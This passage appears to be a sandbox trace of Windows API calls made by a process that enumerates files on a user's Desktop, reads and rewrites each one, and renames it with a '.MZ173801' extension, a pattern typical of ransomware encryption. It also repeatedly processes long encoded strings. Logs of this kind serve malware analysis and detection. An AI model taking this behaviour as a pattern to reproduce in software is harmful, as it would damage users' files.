(lpFileName="C:\\Users\\FD1HVy\\Desktop\\f7Dp_pgi57G6wvUm.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\f7dp_pgi57g6wvum.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.129] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.129] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.129] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xe120 [0123.129] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.129] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xe120, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xe120, lpOverlapped=0x0) returned 1 [0123.130] CloseHandle (hObject=0x410) returned 1 [0123.131] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\f7Dp_pgi57G6wvUm.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\f7dp_pgi57g6wvum.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.133] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xe120, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0xe120, lpOverlapped=0x0) returned 1 [0123.135] CloseHandle (hObject=0x410) returned 1 [0123.135] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\f7Dp_pgi57G6wvUm.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\f7dp_pgi57g6wvum.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\f7Dp_pgi57G6wvUm.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\f7dp_pgi57g6wvum.mkv.mz173801")) returned 1 [0123.136] GetCurrentThreadId () returned 0x1358 [0123.136] GetCurrentThreadId () returned 0x1358 [0123.136] GetCurrentThreadId () returned 0x1358 [0123.136] GetCurrentThreadId () returned 0x1358 [0123.136] GetCurrentThreadId () returned 0x1358 [0123.136] GetCurrentThreadId () returned 0x1358 [0123.136] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78fdc030, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0xa7692150, ftLastAccessTime.dwHighDateTime=0x1d5e5d4, ftLastWriteTime.dwLowDateTime=0xa7692150, ftLastWriteTime.dwHighDateTime=0x1d5e5d4, nFileSizeHigh=0x0, nFileSizeLow=0x7e61, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="H4CXj5T.gif", cAlternateFileName="")) returned 1 [0123.136] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.136] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.136] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\H4CXj5T.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\h4cxj5t.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78fdc030, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0xa7692150, ftLastAccessTime.dwHighDateTime=0x1d5e5d4, ftLastWriteTime.dwLowDateTime=0xa7692150, ftLastWriteTime.dwHighDateTime=0x1d5e5d4, nFileSizeHigh=0x0, nFileSizeLow=0x7e61)) returned 1 [0123.136] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.136] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.137] GetCurrentThreadId () returned 0x1358 [0123.137] GetCurrentThreadId () returned 0x1358 [0123.137] GetCurrentThreadId () returned 0x1358 [0123.137] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.137] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.137] GetCurrentThreadId () returned 0x1358 [0123.137] GetCurrentThreadId () returned 0x1358 [0123.137] GetCurrentThreadId () returned 0x1358 [0123.137] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\H4CXj5T.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\h4cxj5t.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.138] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.138] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.138] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x7e61 [0123.138] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.138] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x7e61, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x7e61, lpOverlapped=0x0) returned 1 [0123.139] CloseHandle (hObject=0x410) returned 1 [0123.139] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\H4CXj5T.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\h4cxj5t.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.140] WriteFile (in: hFile=0x410, lpBuffer=0x2439b60*, nNumberOfBytesToWrite=0x7e61, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2439b60*, lpNumberOfBytesWritten=0x19f9bc*=0x7e61, lpOverlapped=0x0) returned 1 [0123.142] CloseHandle (hObject=0x410) returned 1 [0123.142] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\H4CXj5T.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\h4cxj5t.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\H4CXj5T.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\h4cxj5t.gif.mz173801")) returned 1 [0123.142] GetCurrentThreadId () returned 0x1358 [0123.142] GetCurrentThreadId () returned 0x1358 [0123.142] GetCurrentThreadId () returned 0x1358 [0123.142] GetCurrentThreadId () returned 0x1358 [0123.142] GetCurrentThreadId () returned 0x1358 [0123.142] GetCurrentThreadId () returned 0x1358 [0123.142] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3612c10, ftCreationTime.dwHighDateTime=0x1d5e856, ftLastAccessTime.dwLowDateTime=0x93b74e60, ftLastAccessTime.dwHighDateTime=0x1d5efe9, ftLastWriteTime.dwLowDateTime=0x93b74e60, ftLastWriteTime.dwHighDateTime=0x1d5efe9, nFileSizeHigh=0x0, nFileSizeLow=0x82ef, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="hrJq.m4a", cAlternateFileName="")) returned 1 [0123.142] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.142] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.142] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\hrJq.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\hrjq.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3612c10, ftCreationTime.dwHighDateTime=0x1d5e856, ftLastAccessTime.dwLowDateTime=0x93b74e60, ftLastAccessTime.dwHighDateTime=0x1d5efe9, ftLastWriteTime.dwLowDateTime=0x93b74e60, ftLastWriteTime.dwHighDateTime=0x1d5efe9, nFileSizeHigh=0x0, nFileSizeLow=0x82ef)) returned 1 [0123.143] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.143] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.143] GetCurrentThreadId () returned 0x1358 [0123.143] GetCurrentThreadId () returned 0x1358 [0123.143] GetCurrentThreadId () returned 0x1358 [0123.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, 